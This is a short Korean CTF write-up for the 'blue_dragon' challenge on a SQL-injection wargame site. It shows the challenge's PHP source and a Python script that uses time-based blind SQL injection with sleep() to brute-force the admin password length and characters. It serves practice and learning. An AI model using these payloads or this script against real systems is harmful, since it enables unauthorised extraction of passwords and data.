sangjun

문제소스

query : select id from prob_blue_dragon where id='' and pw=''

<?php
  include "./config.php";
  login_chk();
  $db = dbconnect();
  if(preg_match('/prob|_|\./i', $_GET[id])) exit("No Hack ~_~");
  if(preg_match('/prob|_|\./i', $_GET[pw])) exit("No Hack ~_~");
  $query = "select id from prob_blue_dragon where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(preg_match('/\'|\\\/i', $_GET[id])) exit("No Hack ~_~");
  if(preg_match('/\'|\\\/i', $_GET[pw])) exit("No Hack ~_~");
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>";

  $_GET[pw] = addslashes($_GET[pw]);
  $query = "select pw from prob_blue_dragon where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("blue_dragon");
  highlight_file(__FILE__);
?>

문제 분석 및 페이로드

1. No hack이 뜨기 전에 쿼리가 실행되니까 Time Based sqli

import requests
import string
import time
URL="https://los.rubiya.kr/chall/blue_dragon_23f2e3c81dca66e496c7de2d63b82984.php"
brute=string.digits+string.ascii_letters+string.punctuation
cookies={"PHPSESSID":"kmo07vm0qujgagfi56vspjh5f8"}
passwd=""
print(brute)
length=-1
#find passwd Length
for i in range(100):
    query=f"""?id=admin&pw=' or id='admin' %26%26 if(length(pw)={i},sleep(1),1)%23"""  #그냥 leng(pw)해주면 guest pw가 4라서 이상하게 나온다.
    start=time.time()
    response=requests.get(URL+query,cookies=cookies)
    print(response.text)
    end=time.time()-start
    if end>1:
        length=i
        break

print(f"pass length is {length}")
# #find passwd
for i in range(1,length+1):
    for ch in brute:
        start=time.time()
        query=f"""?id=admin&pw=' or id='admin' %26%26 if(ord(mid(pw,{i},1))={ord(ch)},sleep(1),1)%23"""
        response=requests.get(URL+query,cookies=cookies)
        end=time.time()-start
        print(query)
        if end>1:
            passwd+=ch
            break

print(f"passwd is {passwd}")